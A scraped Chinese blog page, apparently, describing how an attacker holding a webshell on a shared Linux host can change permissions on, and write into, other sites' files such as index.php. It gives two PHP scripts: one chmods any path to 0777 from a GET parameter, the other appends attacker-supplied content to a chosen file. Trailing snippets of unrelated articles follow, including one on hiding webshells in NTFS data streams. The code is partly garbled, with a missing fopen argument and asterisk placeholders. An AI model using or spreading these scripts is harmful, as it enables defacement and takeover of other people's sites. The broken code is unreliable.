當我們擁有了乙個linux下的shell(伺服器上多個**)。
這個shell對所在站點的根目錄有可寫入許可權,甚至能檢視其他**的目錄。
那麼,這樣的主機設定肯定是不安全的。
有的時候,我們想對獲得同伺服器的其他站的許可權,比如直接對其他站點的index.php進行修改,卻發現沒有許可權。
我們可以嘗試通過以下指令碼來實現對其他站點的檔案新增許可權。
**:<?php
$path = stripslashes($_get['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo chmod ok , permission editable file or directory. permission to write;
?>
儲存為chmod.php
使用方法簡單,訪問
其他站點的目錄/index.php
這裡的index.php是要修改許可權的檔案。
另外乙個exploit:
把下面的**儲存為exploit.php
**:<?php
@$filename = stripslashes($_post['filename']);
@$mess = stripslashes($_post['mess']);
$fp = @fopen(, 'a');
@fputs($fp,$mess
);@fclose($fp);
?>
changing chmod permissions exploit – contact : the_gl4di4t0r[at]hotmail[dot]com
linux下用webshell修改檔案許可權
當我們擁有了乙個linux下的shell 伺服器上多個 這個shell對所在站點的根目錄有可寫入許可權,甚至能檢視其他 的目錄。那麼,這樣的主機設定肯定是不安全的。有的時候,我們想對獲得同伺服器的其他站的許可權,比如直接對其他站點的index.php進行修改,卻發現沒有許可權。我們可以嘗試通過以下指...
webshell隱藏之WIN下NTFS資料流的利用
這個利用方式。早在幾年前就有了,並不是什麼新的。以前我也沒有特意的注意過。今天特意弄了下,所以也就記錄一下。首先我們寫如下指令碼生成個新的php檔案 複製 x.php txt生成後的大小為0kb,開啟也沒有任何東西。下面我利用如下語句進行包含操作 include x.php txt 複製 正確執行了...
Linux下用speedtest cli測網速
在linux 的命令列中使用speedtest cli來測試寬頻連線速度。wget chmod a rx speedtest cli.py sudo mv speedtest cli.py usr local bin speedtest cli sudo chown root root usr lo...